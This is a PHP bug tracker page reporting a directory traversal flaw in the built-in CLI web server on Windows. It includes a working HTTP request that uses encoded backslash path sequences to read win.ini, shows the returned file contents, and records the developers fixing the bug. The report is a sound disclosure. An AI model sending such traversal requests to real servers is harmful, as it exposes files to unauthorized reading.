php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #70264 CLI server directory traversal
Submitted: 2015-08-14 00:05 UTC Modified: 2015-08-14 11:34 UTC
From: jplopezy at gmail dot com Assigned: cmb
Status: Closed Package: Built-in web server
PHP Version: 5.6.12 OS: Windows only
Private report: No CVE-ID:
 [2015-08-14 00:05 UTC] jplopezy at gmail dot com
Description:
------------
The bug is in the local php web server for testing (http://php.net/manual/es/features.commandline.webserver.php)

This readme says that this webserver is only for testing, but maybe in a lan this issue allow to steal files from the devolverps, or maybe some other people use in production this web server in php.





Test script:
---------------
Only you need send this request

GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
Host: 127.0.0.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*




Expected result:
----------------
Don't display files that escape from the webserver directory.

Actual result:
--------------
Response with my win.ini


; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-08-14 00:16 UTC] stas@php.net
-Type: Security +Type: Bug
 [2015-08-14 00:16 UTC] stas@php.net
CLI server is a debugging server so should not be used in production context.
 [2015-08-14 11:34 UTC] cmb@php.net
-Summary: PHP 5.6.12 directory traversal +Summary: CLI server directory traversal -Status: Open +Status: Verified -Package: HTTP related +Package: Built-in web server -Operating System: Windows 7 +Operating System: Windows only -Assigned To: +Assigned To: cmb
 [2015-08-14 15:20 UTC] cmb@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-14 15:20 UTC] cmb@php.net
-Status: Verified +Status: Closed
 [2015-08-14 15:21 UTC] cmb@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 [2015-08-18 16:24 UTC] ab@php.net
Automatic comment on behalf of cmb
Revision: http://git.php.net/?p=php-src.git;a=commit;h=9c805a6cb31596c41609512bdd8a9a76c9ce9b15
Log: Fix #70264: CLI server directory traversal
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC